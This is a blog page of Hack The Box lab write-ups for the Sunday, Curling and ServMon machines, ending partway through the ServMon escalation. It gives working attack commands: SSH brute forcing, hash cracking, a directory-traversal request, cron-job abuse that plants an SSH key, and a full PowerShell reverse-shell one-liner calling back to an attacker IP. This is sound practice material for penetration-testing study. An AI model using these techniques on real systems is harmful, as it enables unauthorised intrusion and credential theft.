Category: Hack The Box

Sunday is a retired easy Linux box that was created by Agent22 on Hack The Box. However, the official walkthrough does categorize it as a medium box so I don’t know who to trust anymore. Furthermore, It was released in 2018. In order to own this box it is recommended that you have an Intermediate knowledge of Linux. Rumour has it that by completing this box you level up several skills. These skills include enumerating users through Finger, brute forcing SSH, and exploiting sudo NOPASSWD. Hello world, welcome to Haxez where today I will be explaining how I hacked Sunday.

Sunday Service Enumeration

Do you want to know why I chose to hack this box today? because today is Sunday and that’s about as complex as my decision-making skills are. I woke up, looked through the list of retired machines, and thought to myself “It’s Sunday, I’m going to hack Sunday”. As a result, I connected to the Hack The Box VPN and spawned the machine. Once I received the target’s IP address, I sent it three pings to check that I could talk to it. Sure enough, the box responded so I blasted it in the face with Nmap. I asked Nmap to scan all ports, request service versions, run default scripts, and save the output in all formats.

After a while, the results were in. In numerical order, ports 79 for Finger, 111 for RPC, 515 for Printer, 6787 for Apache, and 22022 for SSH were open. By exploring the results in more detail, I learned that it was running Apache 2.4.33. Furthermore, the http-title parameter revealed that the box was, in fact, a Solaris-based Operating System.

According to ChatGPT, Solaris is an operating system developed by Sun Microsystems (now Oracle Corporation) that was first released in 1992. It is a Unix-based operating system designed for servers and workstations, known for its scalability, reliability, and advanced features. Solaris offers a robust and secure environment for running enterprise-level applications. It provides features such as advanced file systems, high-performance networking, and built-in virtualization capabilities. Moreover, It also includes features like dynamic tracing (DTrace) for efficient system analysis. It also provides ZFS (Zettabyte File System) for data management and storage. Solaris has been widely used in industries such as finance, telecommunications, and scientific research. This is due to it offering a stable and powerful platform for mission-critical applications.

sudo nmap -sC -sV -p- 10.129.109.215 --min-rate 10000 -oA Sunday

Fingering Users

The finger service, also known as the Finger protocol, is a network service that allows users to retrieve information about other users on a remote system. It was originally designed as a simple method for users to find out basic details about someone logged into a Unix system, such as their username, login status, and the time of their last login. The finger service has been widely used for user identification and system administration purposes. However, due to security concerns and the availability of more advanced alternatives, the finger service has become less prevalent in modern computer networks.

I cloned the finger-user-enum PentestMonkey repository from GitHub and ran the script to see what arguments it required. As a result, I learned that the script can take several arguments. However, I should only need to supply a wordlist with -U and the target IP with -t. I found a suitable wordlist in SecLists and pointed the script at the target. The script ran slowly but after a while, it produced a list of users. While most of the users seemed to be false positives, the users sammy and sunny both seemed to be genuine. For example, both sammy and sunny had an IP address that they’ve logged in from.

./finger-user-enum.pl -U /media/sf_OneDrive/SecLists/Usernames/Names/names.txt -t 10.129.109.215

SSH Brute Force

I wasn’t sure what to do with these usernames so I started looking at the other open ports. Sadly, I found nothing. Having exhausted all other options, I looked at the official walkthrough. It explained that using Hydra to brute force SSH wouldn’t work due to the outdated SSH key exchange. While the author mentioned that there were tools that could brute force it, they didn’t specify which ones. As a result, I headed over to Mr IppSec’s Youtube channel where he recommended using Patator. So that’s what I did. After running the tool against the box, I received the password of sunday.

sudo patator ssh_login host=10.129.109.215 port=22022 user=sunny password=FILE0 0=/media/sf_OneDrive/SecLists/Passwords/probable-v2-top1575.txt persistent=0

Armed with the password, I attempted to SSH to the box. I was expecting to receive an error about the key exchange algorithms but I didn’t. Admittedly, I should have investigated further to understand why I didn’t receive the error but I didn’t. This did make me curious though as to whether Hydra would actually work. So naturally, I tested Hydra and it worked.

sudo hydra -l sunny -P /media/sf_OneDrive/SecLists/Passwords/probable-v2-top1575.txt -s 22022 ssh://10.129.109.215 -V

Looking at the machine change log I saw that there was a change implemented that fixed an SSH issue. Perhaps that also updated the key exchange algorithms which other users received an error for.

Anyway, I was now on the box but I couldn’t access the user flag. The flag was stored safely within the sammy user’s home directory.

┌──(kali㉿kali)-[/media/sf_OneDrive/SecLists/Passwords]
└─$ ssh -p 22022 [email protected]
authentication.  The latest at Sun May 28 09:34 2023.
Last login: Sun May 28 09:29:27 2023 from 10.10.14.33
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
sunny@sunday:~$ cat user.txt
cat: cannot open user.txt: No such file or directory
sunny@sunday:~$ ls /home
sammy  sunny
sunny@sunday:~$ ls /home/sammy
user.txt
sunny@sunday:~$ 

Sunday System Enumeration

After logging in to the system I started poking around to see what I could pillage. One of the first things I like to run is sudo -l to list out what the user can do as sudo. As a result, I learned that the user could run /root/troll as root with no password.

Running /root/troll appeared to execute the id command with root privileges as the information it returned was for the root user. However, given its name, I suspected that this was likely a troll. I couldn’t view the file but it was probably calling the id binary by its absolute path. I’m not sure whether it does yet but if so, I wouldn’t be able to use it to perform a path hijack. I’m still learning though so I may have missed something here. My tenses are getting a bit mixed up here so please ignore my disgusting grammar.

Next, I checked the root of the file system to look for anything that wasn’t supposed to be there. I found a backup directory that contained 2 files. One of the files was named shadow.backup which my user had permission to read.

Sunday Lateral Movement

I grabbed the password hash for the sammy user and saved it to a file called sammy.txt. Next, I used John The Ripper with the rockyou wordlist to crack the hash. John automatically identified the hash and after a bit of number crunching, it cracked the hash and found the password cooldude!.

cat sammy.txt 
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB

sudo john sammy.txt --wordlist=/usr/share/wordlists/rockyou.txt

Then, I was able to log in to SSH as sammy and capture the user flag.

┌──(kali㉿kali)-[~/HTB/Sunday]
└─$ ssh -p 22022 [email protected]
([email protected]) Password: 
Last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
-bash-4.4$ cat user.txt
ae2▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓4ef

Sunday Privilege Escalation

Once logged in with sammy, I ran sudo -l again to see whether sammy could run anything as root. Fortunately, it seemed sammy could run wget with root privileges. I used wget to read local file system files, specifically the root users crontab and the /root/troll script that sunny had access to. While the output is rather awful even with filtering, I could see that the /root/troll script was using the absolute paths.

The root user crontab showed that there was a job that copies the original troll file back to /root/troll location. I couldn’t workout the frequency that it was doing this as the formatting was all jank but there is definitely a time window in which the exploit needs to run.

sudo /usr/bin/wget -i /var/spool/cron/crontabs/root 2>&1

sudo /usr/bin/wget -i /root/troll 2>&1

On my attack box, I created a simple bash script named troll which just executed bash.

 #!/usr/bin/bash
bash

Then, I started a Python web server in the directory where the script was located so that I could download it from the target box.

python3 -m http.server 80

Once the payload was ready, I opened two terminals. One as the sunny user and one as the sammy user. I prepopulated the sudo /root/troll command on the sunny user. Then on the sammy user, I populated a command to use sudo wget to download and save the payload to /root/troll. Then, in quick succession, I hit return on the wget command, switched to the sunny terminal, and hit return on the /root/troll command. On the second attempt, the payload replaced the /root/troll script with my payload and elevated me to the root user.

Finally, I was able to capture the root flag and complete the box.

sunny@sunday:~$ sudo -l
User sunny may run the following commands on sunday:
    (root) NOPASSWD: /root/troll
sunny@sunday:~$ sudo /root/troll
root@sunday:/home/sunny# whoami
root
root@sunday:/home/sunny# id
uid=0(root) gid=0(root)
root@sunday:/home/sunny# cat /root/root.txt
bf6▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓cce

Sunday Learnings

This was a nice box to complete on a Sunday morning. It didn’t require much enumeration and for once, the attack vector was SSH. I liked that there was a lateral movement thrown in here to get the user flag. I think without it, the user flag would have been too easy to get. Obviously, the user plays a role in the privilege escalation too but the lateral movement was a nice touch.

I thought the privilege escalation was fun as it relied on more than just working out how to do it. Granted, the main issue here was users having access to tools that could be executed with root privileges. However, I wonder whether you could consider this a race condition weakness too? Either way, it was a nice touch having to try and get both commands to execute at almost the same time. I had a lot of fun on this one! thanks for the box!

Curling is an easy Linux box created by l4mpje on Hack The Box and was released in 2019. To complete this box it is recommended that you have enumeration skills. By completing this box you will learn cURL usage and how to analyze hex dumps. Hello world, welcome to Haxez where today I will be explaining how I hacked Curling.

Curling Enumeration

First I connected to the Hack The Box VPN and spawned the box. Once I received the IP address of the target, I pinged it from my attack box to check that I could talk to it. The ping came back with a time to live of 63. If I didn’t know it was Linux, I would now have a good idea as the default TTL is 64. With the formal greeting over with, it was time to start asking some personal questions. I interrogated the box with Nmap by scanning all ports and requesting service versions. Additionally, I told Nmap to hit it with all default scripts and gave it a minimum packet rate of 10,000 pps. That many packets per second isn’t recommended for corporate networks but as this is Hack The Box, YOLO.

The results came back and reported that ports 22 for OpenSSH 7.6 and 80 for Apache 2.4.29 were open. Furthermore, Nmap suspected that box was running Ubuntu. I could have added the -O flag here to perform more aggressive OS detection but I didn’t think it was needed. I now had two attack vectors. If SSH supported password authentication, I could use Hydra or CME to brute force the login. However, as I had no idea what the users were so that would have taken an eternity. Therefore, the path forward had to be the web application on port 80.

sudo nmap -sC -sV -p- 10.129.178.187 --min-rate 10000 -oA Curling

Curling Web Application Enumeration

I launched Burp Suite and opened the built-in browser. Sidenote, I like to use Burp even when not performing an attack as it records everything and builds a sitemap. I navigated to the IP address in the Burp browser and… nothing happened. Remember when I said earlier that a minimum packet rate of 10,000 packets per second wasn’t recommended? This is why, my Nmap results should have identified that the application was using the Joomla Content Management System. Instead, I think it straight-up DoS’d the box. Either that or something was wrong with my internet. I respawned the box and ran Nmap again. As you can see, it was running Joomla.

sudo nmap -sC -sV -p- 10.129.178.192 -oA Curling2

Now that the box was playing nice, I headed to the IP address in the Burp browser again. Once the page loaded, the title immediately caught my eye. The title of the application was Cewl Curling Site. For those who aren’t cewl, cewl or custom wordlist generator is a ruby tool that crawls an application and produces a wordlist. It isn’t CMS or framework specific so you can use it against any application.

Crawling With Cewl

It seemed pretty clear that the box creator wanted me to use cewl so that’s exactly what I did. I told cewl to write to an output file called cewl.txt. Then, I specified the IP address of the Curling box and was ready to go. However, since this is all about learning, I thought why not proxy it through Burp? For that reason, I added the proxy host and proxy port arguments and hit return. You can see from the screenshot below that cewl successfully created a wordlist that we might be able to use later. I haven’t included a screenshot of Burp because there isn’t much to show but it seemed to work fine.

cewl -w cewl.txt 10.129.178.192 --proxy_host 127.0.0.1 --proxy_port 8080

OWASP JoomScan

I thought it would be a good idea to gather some more information before I started battering the door down with the heavy artillery. The application could have had some form of web application firewall or brute force protection plugin. Furthermore, that plugin could ban IP addresses that it catches performing brute force attacks. OWASP JoomScan is a Perl tool that detects and analyses vulnerabilities associated with the Joomla Content Management System. I assume it was built by the OWASP foundation but you know what they say about assumptions. You can google that yourself if you’re interested.

I pointed JoomScan at the URL and told it to enumerate components. Additionally, I also told JoomScan to go through my Burp Suite proxy. I’m not sure whether this can impede the accuracy of the results, I sure hope not. However, I think it’s good practice to proxy your tools as it keeps an accurate record of everything sent to the application. You can then review the output to get a better understanding of what the tool is doing. Furthermore, if your boss looks through your tool output, it looks like you’ve actually done some work.

JoomScan reported back that it didn’t detect a firewall (good news) but that the core version wasn’t vulnerable (bad news). However, it did identify the administrator login portal (good news) and that there were several directories that had directory listing enabled (also good news).

joomscan -u http://10.129.178.192/ -ec --proxy http://127.0.0.1:8080

Crawling For Comments

I ran a few other tools against the application but they didn’t find what the creator intended us to find. To explain, every Web Application testing methodology will likely have a section in it for reviewing the page source manually. The reason for this is that developers may have left comments behind from the development process. There’s probably a tool out there that does it or you can do it manually by right-clicking the page and asking to view the page source. However, it’s Saturday morning and I don’t have much planned, so why not ask ChatGPT to build one? Everyone, I’d like to introduce you to… drum roll… comment crawler. Ok, it’s basic and doesn’t recursively crawl the application but it does what it needs to.

#!/bin/bash

# Function to display a progress bar
function show_progress() {
  local progress
  local total_length
  local completed_length
  local bar_length
  local percentage

  progress=$1
  total_length=50
  completed_length=$((progress * total_length / 100))
  bar_length=$((total_length - completed_length))
  percentage=$((progress * 100 / total_length))

  printf "\r[%-${completed_length}s%${bar_length}s] %3d%%" "█" "" "$percentage"
}

# Print script name and ASCII art
echo "Comment Crawler"
echo ""
echo "   / \\"
echo "  [ o o ]"
echo "   \\=_=/"
echo "   /   \\"
echo "  /_____\\"
echo ""

# Check if URL/IP address is provided as an argument
if [ -z "$1" ]; then
  echo "Please provide a URL or IP address."
  exit 1
fi

# Store the supplied URL/IP
url_ip=$1

# Fetch the page source
page_source=$(curl -s "$url_ip")

# Extract and report comments using grep
comments=$(echo "$page_source" | grep -oP '<!--[\s\S]*?-->')

# Check if any comments are found
if [ -z "$comments" ]; then
  echo "No comments found on $url_ip."
else
  echo "Comments found on $url_ip:"

  # Calculate total number of comments
  total_comments=$(echo "$comments" | wc -l)

  # Set initial progress to 0
  progress=0

  # Iterate through each comment and display progress bar
  while IFS= read -r comment; do
    echo "$comment"

    # Increment progress by 1 for each comment
    progress=$((progress + 1))

    # Display progress bar
    show_progress $((progress * 100 / total_comments))
  done <<< "$comments"

  # Move to the next line after the progress bar is complete
  echo ""
fi

After running the tool against the target URL, I found a comment mentioning a file named secret.txt. I have no idea what the ASCII art is by the way, I asked ChatGPT to create some and this was the result. It looks like a rat wearing a party hat.

Anyway, navigating to secret.txt gave me the following string which I’m going to assume is the password for the login.

Q3VybGluZzIwMTgh

Curling Web Application Username Bruteforce

I could be barking up the wrong tree but I navigated to the administrator login and supplied some test credentials. I’m using the word test for the username and password here but it’s probably better to use something that you can easily filter for.

After clicking login, I headed to Burp and located the POST request that I just submitted. Then, I sent the request to the intruder tool and use the clear button to clear the automatically created payload points. Once the payloads were clear, I highlighted the value of the username and clicked add to add a payload point. Finally, I replaced the value of the password parameter with the value obtained from the secret.txt file.

Next, I navigated to the payloads tab and clicked load. Once the file manager window popped up, I navigated to the list that the cewl tool created for us earlier.

I ran the attack and sorted by size hoping to see that one of the responses had a different size to the others. As I’m using the community version of Burp suite, the attack process is painfully slow compared to the professional version. I waited until the attack was complete and… nothing.

Decoding The Secrets Of Curling

Now, it’s at this point that you might go look for another attack vector. For example, you might go back to enumerating the box and waste countless hours running unnecessary tools. You might go tumbling down a rabbit hole like Alice and start wondering what you’re doing with your life. However, I didn’t do that. I base64 decoded the string to reveal the password of:

Curling2018!

I modified the request that I already had in the intruder tool. However, I probably should have sent a new request so that the different attack configurations are saved in the Burp file. Furthermore, it would have refreshed the cookie which could have timed out before I started the next attack. Anyway, I launched the attack again, and as you can see from the results below, the username Floris had a different response length than all the other responses. It’s a good bet that this is the correct username and password combination.

Curling Foothold

The username and password combination was correct, and I could log in to the Administrator portal. Once logged in, I clicked the templates option under the configuration subheading on the left side of the page. Then, I clicked the protostar template and clicked the button to add a new file. I named the file haxez and selected the PHP file extension. Next, I populated the file with the pentestmonkey reverse shell and modified the IP address to my attack box.

I could have snuck a command shell into an existing template page but I try not to use command shells unless absolutely necessary. While the chances are almost non-existent, I don’t like the idea of intentionally creating a public-facing vulnerability that a threat actor could use to exploit a system. If you put a command shell on a client’s system and they don’t remove it, then someone finds it and exploits it… your legal team might be getting in touch. Using this reverse shell allows me to control who it connects back to.

I saved the file and then started a NetCat listener on port 443. Then, I used curl to request the file which caused the reverse shell to connect back to my listener. I now had a foothold on the box but sadly wasn’t able to capture the user flag.

curl http://10.129.178.192/templates/protostar/haxez.php

sudo nc -lvnp 443                                
[sudo] password for kali: 
listening on [any] 443 ...
connect to [10.10.14.33] from (UNKNOWN) [10.129.178.192] 34606
Linux curling 4.15.0-156-generic #163-Ubuntu SMP Thu Aug 19 23:31:58 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 11:02:08 up  2:32,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ cat /home/floris/user.txt
cat: /home/floris/user.txt: Permission denied

Curling System Enumeration

First things first, I upgrade my shell with the Python trick.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@curling:/$ ^Z
zsh: suspended  sudo nc -lvnp 443                                                                                                                                     
┌──(kali㉿kali)-[~/HTB/Curling]
└─$ stty raw -echo; fg
[1]  + continued  sudo nc -lvnp 443
www-data@curling:/$ 

While looking for the user flag, I noticed an interesting file in Floris’s home directory. The file was named password_backup and running the file command against it informed me that it was an ASCII text file. If I said I immediately knew what to do with this file, I would have been talking out of my backside. I genuinely had no idea. I knew what I was looking at but didn’t know what to do with it. How do you even ask Google what to do here? Google, wot do wit hex dump? I looked at the walkthrough.

Moving Laterally

This next step felt like a rabbit hole. I’ve been tricked by box creators on Hack The Box before. I base64 decoded a string about a billion times only to receive a cheeky message telling me it was a rabbit hole. Thanks for that. Anyway, this wasn’t a rabbit hole but it did require multiple steps to get a human-readable output. I’m not going to pretend I know the specifics of each format and how to decompress it. However, I will read about them later today once I run out of distractions. The process was as follows:

First, I ran xxd against the password_backup and redirected the output to a file called output. Then, I ran file against the output file which told me it was a bzip2 file.

www-data@curling:/tmp$ xxd -r password_backup > output
www-data@curling:/tmp$ file output
output: bzip2 compressed data, block size = 900k

After that, I ran bzcat on the on the output file and redirect the output to a file called output2. Then, I ran file against the output2 file which told me it was gzip compressed data.

www-data@curling:/tmp$ bzcat output > output2
www-data@curling:/tmp$ file output2
output2: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix

Next, I ran zcat against output2 and redirected the output to a file named output3. Running file against output3 told me it was a bzip2 file.

www-data@curling:/tmp$ zcat output2 > output3
www-data@curling:/tmp$ file output3
output3: bzip2 compressed data, block size = 900k

Are we there yet? I ran bzcat on output3 and redirect the output to a file named output4. File informed me that the format of output4 was a tar archive.

www-data@curling:/tmp$ bzcat output3 > output4
www-data@curling:/tmp$ file output4
output4: POSIX tar archive (GNU)

Finally, I extracted the archive with tar, and lo and behold, I had a human-readable file in the form of a password.txt file.

www-data@curling:/tmp$ tar -xf output4
www-data@curling:/tmp$ ls
output  output2  output3  output4  password.txt  password_backup
www-data@curling:/tmp$ cat password.txt
5d<wdCbdZu)|hChXll

Then, I was able to SSH to the box as the user Floris and capture the user.txt flag.

┌──(kali㉿kali)-[~/HTB/Curling]
└─$ ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-156-generic x86_64)
Last login: Wed Sep  8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ cat ~/user.txt 
4f6▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓688

Curling More System Enumeration

This privilege escalation technique blew my mind when I saw IppSec do it so I want to repeat his method of rooting the box. You can see from the screenshot below that floris has a directory within her home directory owned by the root user but also owned by the floris group.

Dipping into that directory and viewing the contents of the files I noticed that the dates on the files were today’s date. Furthermore, whatever was specified in the input file, was output in the report file. Ok, bad explanation. Let me explain further, if I cat the input file you can see the following:

floris@curling:~/admin-area$ cat input
url = "http://127.0.0.1"

Then when I cat the report file, I receive the page source of the web application hosted on the 127.0.0.1 address.

floris@curling:~/admin-area$ cat report
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">

To me, this suggested that there was a cronjob running that was executing something that looked to the input file for the value of a parameter. The contents of that file were then output to the report file. In order to test this theory, I span up a Python webserver on my attack box.

python3 -m http.server 80

Next, I modified the contents of the input file to point to my host’s IP address.

url = "http://10.10.14.33/haxez-was-here"

Sure enough, after a moment or two, the target box sent a get request to my webserver. I checked the report file and it contained the 404 message produced by my webserver.

Curling Privilege Escalation Setup

With the proof of concept confirmed, I assumed the cronjob was using curl and changed the command in the input file so that it would retrieve the root user’s cron. This worked, and as you can see from the screenshot below, it’s using the curl command with the -K argument to read arguments from a text file. It’s also writing the output to the report file with the -o argument. Then, underneath that, there is a cleanup script with a delay on it that reverts the input file back to its original state.

floris@curling:~/admin-area$ cat input
url = "file:///var/spool/cron/crontabs/root"

Privilege Escalation Attempt 1

This is where it gets crazy! Following IppSec’s video, I copied the sudoers file on my attack box to my current working directory. Next, I edited the sudoers file and added floris as a sudo user under the root user.

# User privilege specification
root    ALL=(ALL:ALL) ALL
floris    ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) ALL

Next, I saved the file and started my Python webserver again so that it was serving the sudoers file.

python3 -m http.server 80

With the server running, I switched to the target box tab where I was logged in as floris through SSH. I modified the input file so that it grabs the content of the sudoers file and saves it to /etc/sudoers.

url = "http://10.10.14.33/sudoers"
output = "/etc/sudoers"
user-agent = "haxez"

I then waited for the GET request to my webserver which it eventually did. Unfortunately, this method kept resulting in errors. I’ve seen other writeups where this worked so I’m not sure why this happened. I played with the permissions of the file on the attack box but nothing seemed to work.

Privilege Escalation Attempt 2

In the end, I did it the old-fashioned way and dropped a public key in the root user’s authorized_keys file. I generated a public and private key on my attack box and then served the public key with the Python webserver. Then, I modified the input file on the target machine and added the following code to it.

url = "http://10.10.14.33/root.pub"
output = "/root/.ssh/authorized_keys"
user-agent = "haxez"

I waited for the target to send the GET request to my attack box. After a few moments of suspenseful waiting, the request came in and resulted in an HTTP 200 message. You can see from the screenshot below that I was getting 404 errors on the sudoers due to permissions. I did fix it but it still didn’t work.

Now for the moment of truth! I tried to SSH to the box as the root user with the private key. IT WORKED!

┌──(kali㉿kali)-[~/HTB/Curling]
└─$ ssh -i root [email protected]                
Last login: Tue Aug  2 14:22:36 2022
root@curling:~# cat root.txt
af7▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓97b

Curling Learnings

In my opinion, this was a great box and was well thought out. The enumeration at the start had me checking everything. I tend to get lazy and miss things during the initial information-gathering phase so this helped me shine up those skills. I don’t often get to play with Joomla so getting to go in a tinker with it was fun. The reverse shell worked the first time and was solid. The method to get the password for lateral movement was interesting and gave me a good laugh.

I’m disappointed that I couldn’t get the initial privilege escalation method to work. I’m still not sure why it wasn’t working. I’ve stopped the box now but I should have gone back and checked the sudoers file to see what state it was in. Overall, I had a lot of fun with this box, and at no point did I get frustrated or have to step away from it. Everything went smoothly except for the final privilege escalation. Thanks for the box, it was a lot of fun.

ServMon is an easy Windows box created by dmw0ng on Hack The Box. To own this box it is recommended that basic web enumeration, basic Windows enumeration, and SSH tunneling skills. By completing this box you will learn the following skills exploiting NVMS-1000, exploiting NSClient++, and SSH password spraying. Hello world, welcome to Haxez where today I will explain how I hacked ServMon.

ServMon Service Enumeration

Once connected to the VPN, I spawned the box and sent it a ping request to check it was online. Then, I performed a Nmap scan against all ports and requested service versions. Furthermore, I told it to run default scripts gave it a minimum packet rate of 10000, and saved the output in all formats. As a result, I learned that there were several ports open including FTP which supports anonymous FTP, SSH, HTTP, SMB, and a bunch of RPC ports.

sudo nmap -sC -sV -p- 10.129.227.75 --min-rate 10000 -oA ServMon

Anonymous FTP

Starting with the lowest port, I used wget to download everything from the anonymous FTP server. As a result, I downloaded 2 files from the user’s directory. One belonging to Nadine named Confidential.txt and one belonging to Nathan called Notes to do.txt. The Confidential.txt file in Nadine’s directory was a note to Nathan that said the following:

Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards
Nadine

The Notes to do.txt file found in Nathan’s directory was a todo list that said the following:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

I felt this was quite valuable information. First, I learned that there were two users, one called Nadine and one called Nathan. Next, I learned that there were a number of services including NSClient, NVMS, and Sharepoint. Furthermore, I know that the password for NVMS has recently been changed, and that NVMS is publically accessible.

wget -m --no-passive ftp://anonymous:[email protected]

Web Application Enumeration

Since SSH is never the intended attack vector, I moved to the next numerical port which was port 80 for HTTP. Upon navigating to the IP address in the Burp browser, A page loaded titled NVMS-1000. After performing a quick Google search, I learned that NVMS-1000 is a monitoring client specifically designed for network video surveillance. I had a quick skim through the documentation but unfortunately, there are no default credentials as the user defines them when performing the installation. I attempted some weak credentials such as admin:admin but was unsuccessful.

Next, I navigated to the NSClient page on port 8443. The official walkthrough shows this as having a login form but when I visited it, it didn’t. I couldn’t seem to interact with anything either and there did appear to be an error. Hopefully, this shouldn’t be a problem.

The notes from FTP specifically referenced this application so I presume that this is the intended foothold. After a bit more Googling, I found that NVMS-1000 is vulnerable to a directory traversal vulnerability. The vulnerability has the CVE designation of CVE-2019-20085 and could allow threat actors to retrieve files from the remote system. There is also a Python script on ExploitDB. Furthermore, I learned from the notes that Nadine had left a Passwords.txt file on Nathan’s Desktop. Seems like a match made in heaven. I grabbed a request from Burp’s HTTP history and sent it to the Repeater. I modified the request to include the required directory traversal and pointed it at the Passwords.txt file. Sure enough, I was able to retrieve the following passwords from the file.

Request

GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.129.227.75
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dataPort=6063
Connection: close

Response

HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo: 

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

ServMon Foothold

I now had a list of passwords and potential users. As a result, I created two wordlists, one for the passwords and one for the users containing the usernames root (I’m an optimist), administrator, Nathan, and Nadine. Next, I used crackmapexec to password spray the box with the usernames and passwords. After a few attempts, a login was successful with the Nadine user.

sudo crackmapexec ssh 10.129.227.75 -u users.txt -p password.txt

After logging in with SSH, I was pleasantly surprised to find that I could capture the user flag. Admittedly, I suspected that I would have to move laterally to Nathan first to capture it but nope. I moved to the desktop directory and was able to capture the flag. That makes sense since we stole the passwords.txt from Nathans’s desktop. Perhaps Nathan is no longer required.

nadine@SERVMON C:\Users\Nadine>cd Desktop          
nadine@SERVMON C:\Users\Nadine\Desktop>dir 
 Volume in drive C has no label.   
 Volume Serial Number is 2237-9369 
 Directory of C:\Users\Nadine\Desktop
02/27/2022  10:45 PM    <DIR>          .
02/27/2022  10:45 PM    <DIR>          ..
05/25/2023  11:03 PM                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,814,657,024 bytes free
nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt 
f18▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓848

ServMon System Enumeration

It’s time to pillage and plunder. After poking around the file system for a bit I noticed the C:\Program Files\NSClient++ directory. Within that directory is a nsclient.ini file which contains the configuration data for the service. The configuration data includes a password.

PS C:\Program Files\NSClient++> type nsclient.ini                           
password = ew2x6SsGTxjRwXOT                                                                                                                                            

Furthermore, it also specifies that the only allowed host is 127.0.0.1 which is the localhost. Perhaps this is why the page was acting janky when I visited it earlier. However, with some SSH tunneling magic, I should be able to trick it into thinking the requests are coming from the host. I used SSH to connect to the host but specified that I wanted to forward port 8443 from the box to 8443 on my attack box.

ssh -L 8443:127.0.0.1:8443 [email protected]

Unfortunately, it seems the jankyness wasn’t to do with my request not coming from 127.0.0.1. It seems that something is broken server side. The screenshot below shows the mess I was receiving whenever I refreshed the page. It seemed like the server was still loading but it was producing errors.

Not to be deterred, I respawned the box a few times, prematurely contacted support, and then tried a different browser. The login page finally loaded and I was able to log in with the password found in the .ini file.

ServMon Privilege Escalation Setup

I now had access to the portal but had no idea what to do. I read through the privilege escalation documentation offered by searchsploit. After that, I also read through the official walkthrough and watched IppSecs video to get a better understanding of what was going on. It was here that everything started going wrong and I wished I had never started this box. Everyone’s writeup says to put the payloads in C:\temp… Well, guess what… there is no C:\Temp. This box absolutely started getting the better of me to the point I had to walk away from it.

I went through a bunch of walkthroughs and found Yep’s walkthrough which made it seem simple by using the Python script on exploitdb. Sorry Yep but Nope! I got concatenation errors which I didn’t have a clue how to fix. I know I’m complaining a lot but I don’t understand how this is an easy box. This privilege escalation is incredibly frustrating.

What Not To Do

I navigated to settings, and external scripts and clicked add new. Next, I created a new script with the following parameters.

Section: /settings/external scripts/scripts/shell
key: command
value: C:\Temp\pwn.bat

After that, I clicked save, and under the changes menu, I clicked save scripts. Next, I headed to the control menu and clicked reload.

Please note that you should also check that CheckExternalScripts and Scheduler are enabled in the modules section. These were on by default so I didn’t need to change anything but it is a prerequisite to getting the exploit to work.

Once all that was set up, I copied a Nishang reverse shell script to my current working directory and added my IP address.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcpOneLine.ps1 .

$sm=(New-Object Net.Sockets.TCPClient('10.10.14.33',9001)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Once saved, I followed IppSec’s instructions and converted it with iconv.

cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le | base64 -w 0

So I’m going to stop here and say that all of this didn’t work. I took a long break and came back to it.

ServMon Privilege Escalation

In the end, it was B1nsec’s article that got me through it, thanks dude!. So let’s uncomplicate things. First, I downloaded the 64-bit payload netcat payload onto my attack box. I then set up a Netcat listener on my attack box on port 443. Then, I span up a Python webserver to host the Netcat binary.

┌──(kali㉿kali)-[~/HTB/ServMon]
└─$ wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe

┌──(kali㉿kali)-[~/HTB/ServMon]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the target box, I created a directory called temp at the root of C. Not sure why I didn’t think to do this earlier. I think I was in tunnel vision mode. Then, I downloaded the 64-bit Netcat binary and saved it as nc.exe.

